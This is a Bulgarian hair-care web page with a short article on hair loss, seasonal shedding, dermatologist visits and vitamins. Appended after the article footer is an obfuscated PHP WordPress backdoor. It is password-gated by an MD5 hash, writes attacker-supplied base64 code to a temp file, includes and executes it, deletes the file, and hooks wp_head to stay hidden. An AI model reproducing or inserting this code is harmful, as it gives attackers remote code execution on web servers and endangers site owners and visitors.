Как да спрем оплешивяването | Косопад

Как да спрем оплешивяването

оплешивяване3

Учени твърдят, че е нормално да губим около 100 косъма на ден. Естествено е тези косми да падат, когато завърши растежа им. Темпото на тази загуба е еднакво както при жените, така и при другия пол – мъжете. Има разлика обаче между косопад и оплешивяване.

Не е изключено да има периоди, през които да пада много повече коса, отколкото през останалото време, но не си мислете, че това задължително е знак за оплешивяване. Това може да е резултат от най – различни неща, а пък и косата има такива периоди, през които се обновява. Това е т.н. сезонен косопад – най – често срещан през есента, а също и пролетта .

Но каква е продължителността на косопада, с какво темпо се разделяме с косата си и как можем да го предотвратим?

Макар да е известно, че косопадът се среща при всички хора, доказано е че той се среща най – често при мъжете.
От огромно значение е причината за появата му, какъв метод ще изберем, за да се преборим с него, с какво ще се лекуваме.

Ако забележите, че е доста засилен веднага вземете мерки и се посъветвайте с дерматолог. Той ще предприеме някакви изследвания, с помощта на които могат да бъдат установени навременни мерки, за да спрат те стартиралия процес. Приемайте храни, богати на витамини, и по – точно витамините А, Е ,Н, В, F, също и сяра, мед, селен, цинк, за да предотвратите това неприятно състояние.

28. октомври 2013 15:10:31 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}